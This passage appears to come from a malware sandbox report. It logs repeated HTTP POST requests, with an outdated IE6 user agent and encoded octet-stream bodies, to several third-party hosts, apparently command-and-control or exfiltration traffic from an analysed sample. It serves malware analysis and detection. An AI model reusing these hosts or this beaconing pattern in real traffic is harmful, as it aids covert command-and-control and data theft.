                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 528User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.wifi4all.nlCache-Control: no-cacheData Raw: 38 59 6f 53 4a 2f 39 32 63 38 38 4d 53 6d 61 77 33 70 69 63 5a 59 68 5a 46 61 70 56 52 31 35 53 6f 33 5a 47 6b 52 37 6e 30 74 52 67 76 42 4c 69 53 33 56 58 38 61 38 30 67 79 73 4b 53 44 7a 6a 65 73 4e 64 6f 41 61 67 52 42 53 4a 59 2b 36 67 61 4f 4d 54 73 32 58 56 2f 68 30 50 6e 39 63 75 6d 30 72 69 55 49 77 31 49 34 6f 39 61 4a 53 58 49 4f 37 79 6b 66 73 38 52 68 55 69 79 49 4e 36 76 46 7a 66 71 55 71 79 77 41 68 2f 6f 63 41 73 37 47 35 7a 55 6f 38 52 33 65 33 78 36 52 44 52 50 38 2f 4a 67 37 52 36 4a 4e 47 36 4c 6e 75 6f 51 2b 71 30 72 64 42 65 78 62 74 79 4a 37 76 69 31 69 51 36 6e 72 6c 37 33 73 34 37 55 56 4d 6e 74 33 6a 48 72 4d 37 5a 6f 34 62 4a 4a 41 46 59 67 36 50 43 4f 51 61 77 54 78 48 43 4d 5a 6f 63 57 63 77 58 65 5a 45 58 42 2b 36 70 79 71 31 44 43 69 45 34 62 47 6a 77 4b 39 37 76 71 62 63 37 59 59 79 2b 4d 2b 59 37 6c 78 31 65 41 64 65 47 6a 76 55 64 6d 33 6a 55 42 67 55 6d 72 56 78 77 38 57 63 6f 68 67 35 48 57 33 67 45 4b 6a 34 37 59 4c 56 64 55 66 71 4d 72 52 42 4c 36 37 4d 6e 71 74 36 49 2b 52 75 2f 54 58 30 33 57 79 55 79 47 6e 43 54 37 43 31 44 37 79 49 62 6a 61 33 6a 7a 30 47 67 47 7a 41 76 33 35 75 65 47 68 79 55 45 56 35 70 47 52 73 6a 35 63 69 46 6a 56 31 72 62 43 38 59 2f 57 4c 45 72 72 46 36 62 73 52 4e 35 50 30 32 44 58 46 68 63 75 42 68 45 38 46 31 64 31 70 54 52 63 50 63 54 4b 43 35 63 2b 56 49 37 48 58 70 55 57 56 33 55 30 36 48 6b 4c 47 45 62 59 52 5a 77 59 73 6f 63 65 47 79 68 62 65 59 56 6b 39 71 39 72 63 41 6d 33 37 64 53 44 57 32 70 64 4d 49 61 61 6b 71 4e 46 70 33 4a 6c 73 32 48 71 52 7a 45 71 48 70 65 48 46 6f 64 67 3d 3d Data Ascii: 8YoSJ/92c88MSmaw3picZYhZFapVR15So3ZGkR7n0tRgvBLiS3VX8a80gysKSDzjesNdoAagRBSJY+6gaOMTs2XV/h0Pn9cum0riUIw1I4o9aJSXIO7ykfs8RhUiyIN6vFzfqUqywAh/ocAs7G5zUo8R3e3x6RDRP8/Jg7R6JNG6LnuoQ+q0rdBexbtyJ7vi1iQ6nrl73s47UVMnt3jHrM7Zo4bJJAFYg6PCOQawTxHCMZocWcwXeZEXB+6pyq1DCiE4bGjwK97vqbc7YYy+M+Y7lx1eAdeGjvUdm3jUBgUmrVxw8Wcohg5HW3gEKj47YLVdUfqMrRBL67Mnqt6I+Ru/TX03WyUyGnCT7C1D7yIbja3jz0GgGzAv35ueGhyUEV5pGRsj5ciFjV1rbC8Y/WLErrF6bsRN5P02DXFhcuBhE8F1d1pTRcPcTKC5c+VI7HXpUWV3U06HkLGEbYRZwYsoceGyhbeYVk9q9rcAm37dSDW2pdMIaakqNFp3Jls2HqRzEqHpeHFodg==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stnic.co.ukCache-Control: no-cacheData Raw: 44 4f 69 65 61 4f 2b 58 64 63 39 53 32 4d 44 5a 44 75 52 48 64 76 68 62 30 7a 4d 46 30 31 54 64 6b 36 36 6b 66 2f 30 78 36 43 4a 49 50 55 52 76 6d 46 41 79 32 5a 32 78 44 30 30 39 4a 42 5a 6a 2f 57 54 2b 38 61 77 54 75 36 43 63 6f 39 6d 4e 62 4a 55 4c 71 34 42 72 46 2f 51 33 67 62 74 48 4f 33 67 51 54 76 49 75 50 44 78 65 4f 62 52 43 52 32 6f 43 6f 6e 6a 56 6a 67 79 4a 4f 66 63 63 50 6a 35 4f 69 65 65 62 4f 31 47 41 7a 65 78 35 66 69 4f 38 6f 61 2f 32 6d 46 34 52 70 66 68 49 70 66 34 54 79 45 65 56 4b 6e 54 48 6c 66 70 4d 2b 45 4a 53 7a 32 72 2b 34 52 43 2b 2b 61 59 77 42 78 76 54 34 68 50 31 46 51 42 46 74 58 77 41 39 56 70 4d 51 4c 4c 58 57 69 33 64 57 39 59 42 76 6c 37 68 46 4b 2b 6e 71 61 50 75 43 49 37 69 73 63 72 2f 5a 61 62 43 41 4c 50 52 63 56 61 71 36 6e 73 57 61 4d 78 39 38 64 71 51 4b 77 63 47 4f 46 48 67 75 49 6d 6d 71 4e 48 49 4d 64 6a 72 37 7a 37 50 77 53 5a 63 62 49 4d 4f 63 50 31 58 2f 44 32 53 42 30 56 30 73 52 42 6c 75 37 59 38 4d 70 78 73 2f 71 74 55 36 4a 36 4d 4c 61 37 65 2f 55 69 4a 37 68 30 49 4e 72 69 4c 61 39 36 43 43 64 4e 6d 47 4a 44 47 6a 43 6f 34 5a 70 33 42 4c 52 6d 63 7a 35 72 75 71 78 68 70 55 36 54 51 33 4a 72 4c 37 53 54 65 34 58 63 35 72 4a 6f 58 4a 51 47 6b 63 66 4c 56 51 30 49 38 46 45 30 48 58 56 2b 6a 57 49 53 73 36 79 75 45 34 62 44 54 48 78 41 43 56 67 74 66 6f 4f 4d 37 4e 57 79 55 31 32 79 46 4c 6d 61 6f 61 33 7a 39 42 46 63 41 50 58 53 43 6a 4e 51 38 4a 56 73 46 7a 37 6b 69 6c 72 77 37 7a 71 38 71 6a 63 4e 4c 68 52 56 49 58 50 68 59 46 73 74 4b 61 64 73 49 58 65 68 56 47 47 5a 6a 67 59 70 6f 4c 5a 4a 7a 39 54 70 71 6d 78 53 33 67 50 45 74 4e 36 49 34 7a 45 76 4d 72 51 49 77 31 6d 6c 7a 4c 64 50 47 64 49 59 6c 64 67 3d 3d Data Ascii: DOieaO+Xdc9S2MDZDuRHdvhb0zMF01Tdk66kf/0x6CJIPURvmFAy2Z2xD009JBZj/WT+8awTu6Cco9mNbJULq4BrF/Q3gbtHO3gQTvIuPDxeObRCR2oConjVjgyJOfccPj5OieebO1GAzex5fiO8oa/2mF4RpfhIpf4TyEeVKnTHlfpM+EJSz2r+4RC++aYwBxvT4hP1FQBFtXwA9VpMQLLXWi3dW9YBvl7hFK+nqaPuCI7iscr/ZabCALPRcVaq6nsWaMx98dqQKwcGOFHguImmqNHIMdjr7z7PwSZcbIMOcP1X/D2SB0V0sRBlu7Y8Mpxs/qtU6J6MLa7e/UiJ7h0INriLa96CCdNmGJDGjCo4Zp3BLRmcz5ruqxhpU6TQ3JrL7STe4Xc5rJoXJQGkcfLVQ0I8FE0HXV+jWISs6yuE4bDTHxACVgtfoOM7NWyU12yFLmaoa3z9BFcAPXSCjNQ8JVsFz7kilrw7zq8qjcNLhRVIXPhYFstKadsIXehVGGZjgYpoLZJz9TpqmxS3gPEtN6I4zEvMrQIw1mlzLdPGdIYldg==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stnic.co.ukCache-Control: no-cacheData Raw: 44 4f 69 65 61 4f 2b 58 64 63 39 53 32 4d 44 5a 44 75 52 48 64 76 68 62 30 7a 4d 46 30 31 54 64 6b 36 36 6b 66 2f 30 78 36 43 4a 49 50 55 52 76 6d 46 41 79 32 5a 32 78 44 30 30 39 4a 42 5a 6a 2f 57 54 2b 38 61 77 54 75 36 43 63 6f 39 6d 4e 62 4a 55 4c 71 34 42 72 46 2f 51 33 67 62 74 48 4f 33 67 51 54 76 49 75 50 44 78 65 4f 62 52 43 52 32 6f 43 6f 6e 6a 56 6a 67 79 4a 4f 66 63 63 50 6a 35 4f 69 65 65 62 4f 31 47 41 7a 65 78 35 66 69 4f 38 6f 61 2f 32 6d 46 34 52 70 66 68 49 70 66 34 54 79 45 65 56 4b 6e 54 48 6c 66 70 4d 2b 45 4a 53 7a 32 72 2b 34 52 43 2b 2b 61 59 77 42 78 76 54 34 68 50 31 46 51 42 46 74 58 77 41 39 56 70 4d 51 4c 4c 58 57 69 33 64 57 39 59 42 76 6c 37 68 46 4b 2b 6e 71 61 50 75 43 49 37 69 73 63 72 2f 5a 61 62 43 41 4c 50 52 63 56 61 71 36 6e 73 57 61 4d 78 39 38 64 71 51 4b 77 63 47 4f 46 48 67 75 49 6d 6d 71 4e 48 49 4d 64 6a 72 37 7a 37 50 77 53 5a 63 62 49 4d 4f 63 50 31 58 2f 44 32 53 42 30 56 30 73 52 42 6c 75 37 59 38 4d 70 78 73 2f 71 74 55 36 4a 36 4d 4c 61 37 65 2f 55 69 4a 37 68 30 49 4e 72 69 4c 61 39 36 43 43 64 4e 6d 47 4a 44 47 6a 43 6f 34 5a 70 33 42 4c 52 6d 63 7a 35 72 75 71 78 68 70 55 36 54 51 33 4a 72 4c 37 53 54 65 34 58 63 35 72 4a 6f 58 4a 51 47 6b 63 66 4c 56 51 30 49 38 46 45 30 48 58 56 2b 6a 57 49 53 73 36 79 75 45 34 62 44 54 48 78 41 43 56 67 74 66 6f 4f 4d 37 4e 57 79 55 31 32 79 46 4c 6d 61 6f 61 33 7a 39 42 46 63 41 50 58 53 43 6a 4e 51 38 4a 56 73 46 7a 37 6b 69 6c 72 77 37 7a 71 38 71 6a 63 4e 4c 68 52 56 49 58 50 68 59 46 73 74 4b 61 64 73 49 58 65 68 56 47 47 5a 6a 67 59 70 6f 4c 5a 4a 7a 39 54 70 71 6d 78 53 33 67 50 45 74 4e 36 49 34 7a 45 76 4d 72 51 49 77 31 6d 6c 7a 4c 64 50 47 64 49 59 6c 64 67 3d 3d Data Ascii: DOieaO+Xdc9S2MDZDuRHdvhb0zMF01Tdk66kf/0x6CJIPURvmFAy2Z2xD009JBZj/WT+8awTu6Cco9mNbJULq4BrF/Q3gbtHO3gQTvIuPDxeObRCR2oConjVjgyJOfccPj5OieebO1GAzex5fiO8oa/2mF4RpfhIpf4TyEeVKnTHlfpM+EJSz2r+4RC++aYwBxvT4hP1FQBFtXwA9VpMQLLXWi3dW9YBvl7hFK+nqaPuCI7iscr/ZabCALPRcVaq6nsWaMx98dqQKwcGOFHguImmqNHIMdjr7z7PwSZcbIMOcP1X/D2SB0V0sRBlu7Y8Mpxs/qtU6J6MLa7e/UiJ7h0INriLa96CCdNmGJDGjCo4Zp3BLRmcz5ruqxhpU6TQ3JrL7STe4Xc5rJoXJQGkcfLVQ0I8FE0HXV+jWISs6yuE4bDTHxACVgtfoOM7NWyU12yFLmaoa3z9BFcAPXSCjNQ8JVsFz7kilrw7zq8qjcNLhRVIXPhYFstKadsIXehVGGZjgYpoLZJz9TpqmxS3gPEtN6I4zEvMrQIw1mlzLdPGdIYldg==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.speelhal.netCache-Control: no-cacheData Raw: 37 70 64 52 77 5a 58 4a 67 4d 2f 6b 53 38 6b 38 66 49 33 58 78 59 37 4b 58 67 65 6a 64 42 2f 32 6d 56 63 39 37 61 31 43 66 38 4b 61 6b 2f 58 72 4a 32 62 68 68 7a 79 56 56 45 34 63 64 4c 43 73 4b 44 58 4b 6e 5a 58 4d 42 2f 4c 79 67 6a 58 61 4f 65 49 46 38 54 30 46 41 33 4e 37 74 2f 2b 49 72 4f 76 54 51 55 55 4a 34 52 32 58 61 74 5a 45 6d 36 32 70 52 36 56 4b 59 72 64 35 6d 75 54 53 41 61 4d 58 39 42 34 63 4b 33 68 4c 4a 6d 4f 39 30 67 71 6e 2b 79 6a 51 55 31 6b 74 65 76 43 70 34 30 4e 39 4a 41 58 4b 30 6d 67 78 67 72 65 6e 49 66 43 70 39 2f 48 4c 6d 5a 6d 64 74 47 78 44 6d 36 52 70 47 4c 73 55 43 46 51 55 70 49 48 65 4e 6f 4a 62 66 4e 4d 48 73 35 59 35 4e 66 77 73 34 50 4e 46 78 57 75 35 30 50 56 79 59 68 44 52 4b 66 77 72 71 4c 55 4b 30 4c 70 41 4d 4e 76 56 62 49 6b 30 30 68 32 67 66 69 53 46 48 64 45 47 6f 71 54 36 48 66 59 53 6e 48 5a 56 50 35 53 76 33 45 4d 5a 7a 34 4b 50 36 64 57 31 44 6a 5a 71 79 63 72 48 73 51 64 6b 62 36 45 55 4c 6c 4c 5a 49 5a 43 57 30 6d 4a 33 4d 35 53 46 44 43 44 6d 4b 30 52 49 65 76 51 54 5a 49 6e 37 6e 73 32 4b 31 6b 77 39 6c 79 6a 67 71 4a 70 4c 65 4c 38 4d 54 58 71 4e 63 53 5a 35 53 43 67 30 4c 4d 6c 65 71 52 63 6e 69 59 4b 79 34 75 34 51 37 71 48 30 52 47 57 64 71 51 55 68 36 57 50 39 4b 67 46 33 35 31 67 36 7a 6e 48 37 4d 5a 45 33 35 32 2b 61 6c 74 34 72 4f 77 4e 30 69 51 37 50 50 6c 5a 36 6c 79 49 44 44 79 52 4e 61 58 6a 70 30 74 66 32 43 54 38 61 2f 77 2f 6b 31 62 36 74 64 75 46 7a 38 56 6e 4a 51 4c 4b 63 73 62 49 6e 54 54 6a 6a 38 42 4b 66 57 65 4e 51 57 2b 36 72 77 39 62 37 74 36 51 52 55 6d 63 63 6c 49 58 44 57 7a 35 65 38 75 6e 37 59 52 4f 5a 54 39 6a 4b 68 6c 73 79 42 56 52 37 51 4b 41 46 35 70 55 67 4a 59 31 53 73 4a 62 4e 6d 47 5a 65 78 66 45 30 64 56 66 6f 56 53 7a 32 55 71 66 53 Data Ascii: 7pdRwZXJgM/kS8k8fI3XxY7KXgejdB/2mVc97a1Cf8Kak/XrJ2bhhzyVVE4cdLCsKDXKnZXMB/LygjXaOeIF8T0FA3N7t/+IrOvTQUUJ4R2XatZEm62pR6VKYrd5muTSAaMX9B4cK3hLJmO90gqn+yjQU1ktevCp40N9JAXK0mgxgrenIfCp9/HLmZmdtGxDm6RpGLsUCFQUpIHeNoJbfNMHs5Y5Nfws4PNFxWu50PVyYhDRKfwrqLUK0LpAMNvVbIk00h2gfiSFHdEGoqT6HfYSnHZVP5Sv3EMZz4KP6dW1DjZqycrHsQdkb6EULlLZIZCW0mJ3M5SFDCDmK0RIevQTZIn7ns2K1kw9lyjgqJpLeL8MTXqNcSZ5SCg0LMleqRcniYKy4u4Q7qH0RGWdqQUh6WP9KgF351g6znH7MZE352+alt4rOwN0iQ7PPlZ6lyIDDyRNaXjp0tf2CT8a/w/k1b6tduFz8VnJQLKcsbInTTjj8BKfWeNQW+6rw9b7t6QRUmcclIXDWz5e8un7YROZT9jKhlsyBVR7QKAF5pUgJY1SsJbNmGZexfE0dVfoVSz2UqfS
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.edimart.huCache-Control: no-cacheData Raw: 44 68 6a 59 6a 72 58 56 64 73 2f 66 37 35 4d 4c 48 4f 74 4b 2f 61 35 4c 4b 50 52 44 41 2b 33 68 75 52 57 72 78 38 67 32 30 6d 74 67 52 49 69 71 69 72 4f 7a 56 35 35 62 70 42 63 4a 2f 30 4a 6c 42 51 66 45 6e 6a 50 48 6a 72 4b 34 75 64 44 67 48 31 52 47 65 69 2f 6c 4c 64 2f 56 62 67 6b 68 45 78 59 74 56 41 4d 7a 4a 48 62 4c 35 6b 65 54 45 4a 44 70 65 77 6f 42 51 52 52 4d 50 4b 65 52 30 6c 73 74 37 51 58 61 55 34 38 42 37 5a 71 78 6f 78 38 32 65 4d 48 61 75 70 71 4d 44 2b 48 37 32 55 44 37 4f 68 44 53 33 56 2b 67 57 4d 6d 75 63 67 62 38 71 2b 50 66 39 37 37 4d 4e 56 37 77 51 73 74 77 4e 57 49 75 42 42 76 30 35 45 46 54 4c 48 2f 6b 75 45 49 49 73 78 37 4a 50 4c 4f 62 42 6d 66 76 2b 4c 31 6f 64 44 6e 42 7a 61 35 72 44 7a 6b 38 62 38 32 6d 63 74 48 76 32 73 56 32 63 46 69 44 34 7a 53 2b 69 71 30 2f 7a 55 76 2f 77 33 50 67 6c 6d 51 6c 4a 72 48 48 47 62 4f 67 45 4e 77 52 77 76 34 42 6c 4c 63 79 55 58 70 54 65 4b 6f 70 42 4e 5a 44 4a 57 63 46 45 2b 50 37 50 6d 74 5a 4e 43 33 54 51 50 64 6b 61 48 47 32 66 55 38 78 65 74 66 65 53 7a 72 35 44 4e 51 46 78 6a 34 7a 69 73 38 75 4f 2b 69 4c 31 5a 41 33 6f 6b 48 6c 52 34 67 36 74 2b 77 55 2f 4b 37 59 2b 43 4c 49 33 78 6f 57 33 65 41 54 41 63 2f 45 64 73 39 69 4d 6f 42 65 43 74 68 34 50 78 71 2f 55 42 67 48 57 4e 43 68 45 77 78 50 72 49 39 6b 42 4b 54 43 39 53 6f 77 31 32 57 77 44 74 71 76 67 71 61 33 63 4e 64 48 38 4c 42 72 74 72 35 47 43 73 63 44 62 6b 6e 73 79 48 69 43 4a 77 73 65 75 4d 75 36 78 6a 32 4f 59 5a 64 75 58 62 54 2b 66 72 51 61 6d 39 56 75 70 49 68 68 75 4f 78 6a 58 52 35 62 6b 38 70 31 53 33 71 39 6b 61 4b 46 46 30 6d 58 57 33 66 50 51 51 36 49 37 4e 2b 67 52 54 4c 30 76 65 55 2f 4a 35 73 51 78 57 79 6c 74 58 7a 75 6d 41 32 34 42 73 57 61 42 50 49 3d Data Ascii: DhjYjrXVds/f75MLHOtK/a5LKPRDA+3huRWrx8g20mtgRIiqirOzV55bpBcJ/0JlBQfEnjPHjrK4udDgH1RGei/lLd/VbgkhExYtVAMzJHbL5keTEJDpewoBQRRMPKeR0lst7QXaU48B7Zqxox82eMHaupqMD+H72UD7OhDS3V+gWMmucgb8q+Pf977MNV7wQstwNWIuBBv05EFTLH/kuEIIsx7JPLObBmfv+L1odDnBza5rDzk8b82mctHv2sV2cFiD4zS+iq0/zUv/w3PglmQlJrHHGbOgENwRwv4BlLcyUXpTeKopBNZDJWcFE+P7PmtZNC3TQPdkaHG2fU8xetfeSzr5DNQFxj4zis8uO+iL1ZA3okHlR4g6t+wU/K7Y+CLI3xoW3eATAc/Eds9iMoBeCth4Pxq/UBgHWNChEwxPrI9kBKTC9Sow12WwDtqvgqa3cNdH8LBrtr5GCscDbknsyHiCJwseuMu6xj2OYZduXbT+frQam9VupIhhuOxjXR5bk8p1S3q9kaKFF0mXW3fPQQ6I7N+gRTL0veU/J5sQxWyltXzumA24BsWaBPI=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fcwcvt.orgCache-Control: no-cacheData Raw: 58 32 36 46 6c 67 61 32 68 38 2b 2f 76 32 72 45 49 5a 56 76 6e 79 6c 35 6f 57 68 6d 54 4a 7a 71 6d 6e 4c 73 36 6a 5a 6a 43 51 46 57 30 39 55 36 2f 5a 76 65 65 31 2b 45 6e 61 69 61 49 49 63 63 42 31 42 59 64 39 59 74 69 62 46 55 75 63 2f 32 6c 43 6e 79 73 2f 4f 45 37 50 51 46 78 6f 77 35 7a 66 36 4e 58 47 50 66 75 52 4e 32 5a 4f 34 43 5a 75 55 4c 66 42 4d 65 4b 50 42 59 62 64 61 41 31 6f 34 57 2f 30 38 39 32 52 6c 74 4f 6c 61 77 4f 63 47 33 49 4c 57 70 75 46 78 74 64 37 6a 68 2f 66 6e 45 79 43 79 71 63 45 48 45 66 39 44 72 30 6c 70 51 46 6d 58 4f 53 78 45 41 58 72 59 77 58 7a 5a 46 38 69 51 4f 78 64 6b 45 52 74 4d 78 2b 70 6c 36 6a 5a 38 5a 37 2f 54 34 41 6f 4d 66 77 53 57 45 34 73 36 41 33 32 44 6f 61 59 2b 52 35 70 62 79 6c 34 43 66 74 33 72 65 53 71 6c 36 2f 36 79 39 66 5a 6f 70 71 56 54 35 39 48 48 62 48 70 45 6a 7a 30 4f 75 57 57 48 6e 75 6d 4c 35 73 4a 33 43 71 6e 41 57 4f 4f 73 36 35 6f 74 2f 53 32 6f 30 55 79 34 4e 45 78 65 4e 36 4b 6b 73 63 67 61 30 44 72 74 31 4c 33 4e 6b 66 53 7a 34 31 32 75 51 6c 45 37 6a 4b 75 48 4b 4f 70 55 53 58 49 70 2b 53 31 41 66 5a 72 4d 6c 56 77 4b 30 65 4b 6e 48 34 33 47 48 37 78 48 71 32 2b 42 4d 7a 5a 53 66 75 61 4a 79 4a 76 2b 39 67 67 55 68 6b 34 34 58 39 53 51 47 74 31 59 76 55 5a 4d 54 51 51 58 31 62 72 30 41 42 6e 69 50 39 64 72 6f 53 34 41 44 6c 2f 61 48 4e 6f 6d 72 69 78 5a 50 4f 64 4d 70 79 4d 4d 66 33 4a 72 52 50 45 4f 74 4d 38 47 54 41 35 33 6a 6a 2f 35 7a 77 35 66 59 6b 45 35 72 35 42 46 37 47 48 33 5a 4d 44 38 51 47 42 46 34 32 37 75 78 33 55 48 7a 63 59 73 66 47 44 59 2b 69 46 35 64 41 66 51 64 2b 48 69 79 50 35 49 61 32 2b 36 7a 78 70 70 7a 5a 48 31 69 42 6b 64 47 37 2f 59 79 78 38 75 6c 30 36 79 6d 6e 67 49 58 48 63 68 36 47 50 65 42 34 58 4a 4a Data Ascii: X26Flga2h8+/v2rEIZVvnyl5oWhmTJzqmnLs6jZjCQFW09U6/Zvee1+EnaiaIIccB1BYd9YtibFUuc/2lCnys/OE7PQFxow5zf6NXGPfuRN2ZO4CZuULfBMeKPBYbdaA1o4W/0892RltOlawOcG3ILWpuFxtd7jh/fnEyCyqcEHEf9Dr0lpQFmXOSxEAXrYwXzZF8iQOxdkERtMx+pl6jZ8Z7/T4AoMfwSWE4s6A32DoaY+R5pbyl4Cft3reSql6/6y9fZopqVT59HHbHpEjz0OuWWHnumL5sJ3CqnAWOOs65ot/S2o0Uy4NExeN6Kkscga0Drt1L3NkfSz412uQlE7jKuHKOpUSXIp+S1AfZrMlVwK0eKnH43GH7xHq2+BMzZSfuaJyJv+9ggUhk44X9SQGt1YvUZMTQQX1br0ABniP9droS4ADl/aHNomrixZPOdMpyMMf3JrRPEOtM8GTA53jj/5zw5fYkE5r5BF7GH3ZMD8QGBF427ux3UHzcYsfGDY+iF5dAfQd+HiyP5Ia2+6zxppzZH1iBkdG7/Yyx8ul06ymngIXHch6GPeB4XJJ
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.edimart.huCache-Control: no-cacheData Raw: 44 68 6a 59 6a 72 58 56 64 73 2f 66 37 35 4d 4c 48 4f 74 4b 2f 61 35 4c 4b 50 52 44 41 2b 33 68 75 52 57 72 78 38 67 32 30 6d 74 67 52 49 69 71 69 72 4f 7a 56 35 35 62 70 42 63 4a 2f 30 4a 6c 42 51 66 45 6e 6a 50 48 6a 72 4b 34 75 64 44 67 48 31 52 47 65 69 2f 6c 4c 64 2f 56 62 67 6b 68 45 78 59 74 56 41 4d 7a 4a 48 62 4c 35 6b 65 54 45 4a 44 70 65 77 6f 42 51 52 52 4d 50 4b 65 52 30 6c 73 74 37 51 58 61 55 34 38 42 37 5a 71 78 6f 78 38 32 65 4d 48 61 75 70 71 4d 44 2b 48 37 32 55 44 37 4f 68 44 53 33 56 2b 67 57 4d 6d 75 63 67 62 38 71 2b 50 66 39 37 37 4d 4e 56 37 77 51 73 74 77 4e 57 49 75 42 42 76 30 35 45 46 54 4c 48 2f 6b 75 45 49 49 73 78 37 4a 50 4c 4f 62 42 6d 66 76 2b 4c 31 6f 64 44 6e 42 7a 61 35 72 44 7a 6b 38 62 38 32 6d 63 74 48 76 32 73 56 32 63 46 69 44 34 7a 53 2b 69 71 30 2f 7a 55 76 2f 77 33 50 67 6c 6d 51 6c 4a 72 48 48 47 62 4f 67 45 4e 77 52 77 76 34 42 6c 4c 63 79 55 58 70 54 65 4b 6f 70 42 4e 5a 44 4a 57 63 46 45 2b 50 37 50 6d 74 5a 4e 43 33 54 51 50 64 6b 61 48 47 32 66 55 38 78 65 74 66 65 53 7a 72 35 44 4e 51 46 78 6a 34 7a 69 73 38 75 4f 2b 69 4c 31 5a 41 33 6f 6b 48 6c 52 34 67 36 74 2b 77 55 2f 4b 37 59 2b 43 4c 49 33 78 6f 57 33 65 41 54 41 63 2f 45 64 73 39 69 4d 6f 42 65 43 74 68 34 50 78 71 2f 55 42 67 48 57 4e 43 68 45 77 78 50 72 49 39 6b 42 4b 54 43 39 53 6f 77 31 32 57 77 44 74 71 76 67 71 61 33 63 4e 64 48 38 4c 42 72 74 72 35 47 43 73 63 44 62 6b 6e 73 79 48 69 43 4a 77 73 65 75 4d 75 36 78 6a 32 4f 59 5a 64 75 58 62 54 2b 66 72 51 61 6d 39 56 75 70 49 68 68 75 4f 78 6a 58 52 35 62 6b 38 70 31 53 33 71 39 6b 61 4b 46 46 30 6d 58 57 33 66 50 51 51 36 49 37 4e 2b 67 52 54 4c 30 76 65 55 2f 4a 35 73 51 78 57 79 6c 74 58 7a 75 6d 41 32 34 42 73 57 61 42 50 49 3d Data Ascii: DhjYjrXVds/f75MLHOtK/a5LKPRDA+3huRWrx8g20mtgRIiqirOzV55bpBcJ/0JlBQfEnjPHjrK4udDgH1RGei/lLd/VbgkhExYtVAMzJHbL5keTEJDpewoBQRRMPKeR0lst7QXaU48B7Zqxox82eMHaupqMD+H72UD7OhDS3V+gWMmucgb8q+Pf977MNV7wQstwNWIuBBv05EFTLH/kuEIIsx7JPLObBmfv+L1odDnBza5rDzk8b82mctHv2sV2cFiD4zS+iq0/zUv/w3PglmQlJrHHGbOgENwRwv4BlLcyUXpTeKopBNZDJWcFE+P7PmtZNC3TQPdkaHG2fU8xetfeSzr5DNQFxj4zis8uO+iL1ZA3okHlR4g6t+wU/K7Y+CLI3xoW3eATAc/Eds9iMoBeCth4Pxq/UBgHWNChEwxPrI9kBKTC9Sow12WwDtqvgqa3cNdH8LBrtr5GCscDbknsyHiCJwseuMu6xj2OYZduXbT+frQam9VupIhhuOxjXR5bk8p1S3q9kaKFF0mXW3fPQQ6I7N+gRTL0veU/J5sQxWyltXzumA24BsWaBPI=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.netcr.comCache-Control: no-cacheData Raw: 51 70 42 56 72 78 45 30 67 4d 2f 76 33 34 65 30 73 46 35 5a 38 47 71 6d 59 45 44 50 68 6b 77 52 31 59 4f 62 46 67 58 62 74 75 71 52 4c 75 56 36 41 38 5a 6e 38 59 34 67 45 6b 32 77 64 53 45 4e 4d 42 6d 30 4f 6a 51 4e 42 2b 47 6a 68 42 53 48 67 31 31 31 64 2b 37 41 6a 58 45 77 67 6b 4b 39 38 50 6c 68 5a 75 38 70 41 54 6f 56 6a 48 79 6d 44 33 59 42 78 31 50 33 4a 46 56 36 51 6f 38 66 78 6c 69 75 75 2b 74 6b 4f 49 49 50 57 56 6a 4d 44 42 4f 54 55 6d 5a 35 30 39 67 4f 34 7a 36 58 4c 35 55 74 72 46 32 67 4a 4e 66 6f 4d 64 73 41 4a 32 4e 6a 79 4d 7a 49 4d 39 46 42 48 78 48 61 32 72 71 61 71 43 65 66 36 51 71 61 4d 42 76 4c 55 50 33 7a 6b 4f 76 49 2f 33 67 75 38 42 43 66 44 50 6f 5a 6e 38 38 56 6f 65 4a 42 59 59 72 6d 41 55 4a 2f 76 4c 5a 67 58 7a 30 6a 64 64 64 33 49 38 72 74 54 47 62 65 6f 47 41 71 63 51 4a 73 4d 35 30 30 68 42 45 4a 34 5a 2f 4c 61 41 45 39 41 79 66 65 57 2b 48 5a 6b 33 47 6e 45 32 69 44 64 41 65 74 6f 67 6a 57 7a 49 57 65 39 2f 31 46 55 38 33 66 43 73 36 33 33 66 52 73 7a 37 61 44 66 41 55 71 72 31 51 41 57 65 69 78 58 30 33 72 79 70 71 77 73 43 75 64 58 67 43 33 34 53 55 59 50 72 37 47 31 54 4e 33 4a 6a 64 76 45 78 38 79 37 6b 48 46 4e 6f 4c 52 51 4f 74 2f 58 35 31 34 44 4a 38 44 48 49 46 37 63 6e 68 48 2b 42 6b 4e 75 2b 47 48 6a 70 49 43 68 65 6b 42 77 35 68 57 67 76 5a 45 6e 55 44 37 79 57 6d 49 56 57 74 6e 4a 77 7a 53 65 6c 34 54 72 66 37 52 37 75 46 47 68 38 53 36 70 35 41 69 52 70 72 5a 2b 34 64 4a 50 57 59 59 70 4b 6c 6e 66 42 79 2b 33 58 71 33 69 37 70 56 55 31 44 62 37 50 4b 36 77 54 75 52 54 4a 34 5a 51 31 58 